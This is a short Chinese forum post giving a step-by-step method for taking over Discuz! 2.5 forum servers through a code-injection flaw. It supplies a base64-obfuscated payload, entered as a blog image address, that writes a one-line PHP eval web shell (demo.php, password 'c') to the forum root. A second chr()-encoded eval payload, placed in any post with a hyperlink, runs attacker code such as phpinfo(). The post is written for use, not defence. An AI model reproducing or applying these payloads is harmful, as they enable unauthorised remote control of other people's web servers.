直都没找到DZ! 2.5后台拿shell的方法 一直等大牛暴出来 这次 暴了2个。
1.注册任意账户
2.登陆用户,发表blog日志(注意是日志)
3.添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}}
4.访问日志,论坛根目录下生成demo.php,一句话密码C
这个必须是要开启seo
在这个地方。二个的都是这个地方。
最新更新的是能直接在贴子里面拿shell。。
利用方式也并非非得发blog,也不是非得发网络图片,详细的利用我是比如随便发个贴子,内容
${${eval(chr(112).chr(104).chr(112).chr(105).chr(110).chr(102).chr(111).chr(40).chr(41).chr(59))}}
然后给他加上任意超链接,发布即可phpinfo(),
这个自己换成char就可以了
自己敢兴趣的怎么网上搜。好多的。